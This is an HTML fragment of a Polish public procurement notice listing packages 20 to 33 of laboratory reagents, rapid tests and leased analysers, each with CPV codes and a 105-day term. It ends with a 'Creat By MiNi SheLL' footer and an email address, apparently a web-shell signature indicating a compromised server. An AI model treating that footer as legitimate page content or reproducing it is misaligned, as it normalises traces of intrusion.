<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI  Z  APLIKACJĄ  DO  ANALIZATORA  PENTRA 400  DO OZNACZANIA:  Fe i TIBC,  Mg,  LDH,  GGTP,  KREATYNINY - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI  DO  OZNACZANIA  BILIRUBINY  CAŁKOWITEJ  I  BEZPOŚREDNIEJ,  KWASU MOCZOWEGO,  Fe,  CK,  GLUKOZY,  BIAŁKA,  ALP,  ALBUMINY,  TRÓJGLICERYDÓW,  P,  Ca,  ALT,  AST, AMYLAZY CRP,  MOCZNIKA,  BIAŁKA W MOCZU,  CHOLESTEROLU I  HDL CHOLESTEROLU  Z  KALIBRATORAMI  i  KONTROLAMI  WRAZ  Z  DZIERŻAWĄ  ANALIZATORA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI  POMOCNICZE  DO  ANALIZATORA  PENTRA 400 - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI   DO  OZNACZANIA  PARAMETRÓW  RÓWNOWAGI  KWASOWO-ZASADOWEJ  I  JONÓW:  SODU,  POTASU,  WAPNIA  ZJONIZOWANEGO  I  CHLORKÓW  Z  KALIBRATORAMI  I  KONTROLAMI  WRAZ  Z  DZIERŻAWĄ  ANALIZATORA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI  DO  ANALIZATORA  RÓWNOWAGI  KWASOWO-ZASADOWEJ -  AVL - OMNI - C.  Szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZYBKI  TEST  DO  OZNACZANIA  MIANA  ANTYSTREPTOLIZYNY-O.  Szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI,  KALIBRATORY,  MATERIAŁY  KONTROLNE  I  EKSPLOATACYJNE  DO  BADAŃ  IMMUNOCHEMICZNYCH  METODĄ  ELFA  WRAZ  Z  DZIERŻAWĄ  ANALIZATORA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TESTY  LATEKSOWE  RPR - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet nr 27.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZYBKI TEST DO WYKRYWANIA KRWI UTAJONEJ W KALE - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet nr 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PASKI  DO  ANALIZY  MOCZU - 10 parametrowe współpracujące z analizatorem  CLINITEK  STATUS  f-my Bayer. Szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 29.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI,  KALIBRATORY  I  MATERIAŁY  KONTROLNE  DO  BADAŃ  HEMATOLOGICZNYCH  WRAZ  Z  DZIERŻAWĄ  ANALIZATORÓW  PODSTAWOWEGO  I  WSPOMAGAJĄCEGO  (BACK-UP) - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet nr 30.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI,  KALIBRATORY  I  MATERIAŁY  KONTROLNE  DO  BADAŃ  Z  ZAKRESU  HEMOSTAZY  (PT,  APTT,  LA,  ATIII)  WRAZ  Z  DZIERŻAWĄ  ANALIZATORA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet nr 31.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI,  KALIBRATORY,  MATERIAŁY  KONTROLNE  I  EKSPLOATACYJNE  DO  BADAŃ  Z  ZAKRESU  SEROLOGII  TRANSFUZJOLOGICZNEJ  WRAZ  Z  DZIERŻAWĄ  ANALIZATORA  I  SYSTEMU  MANUALNEGO - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet nr 32.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PBS buforowany roztwór soli fizjologicznej o pH:  7,0  +/- 0,05. Szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Pakiet nr 33.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DOSTAWA  ZESTAWÓW  ODCZYNNIKOWYCH  I  MATERIAŁÓW  DO  PRZEPROWADZANIA  BADAŃ  Z  ZAKRESU  CHORÓB  REUMATYCZNYCH  Z  DZIERŻAWĄ  WYPOSAŻENIA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.51.00.00-3, 38.52.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com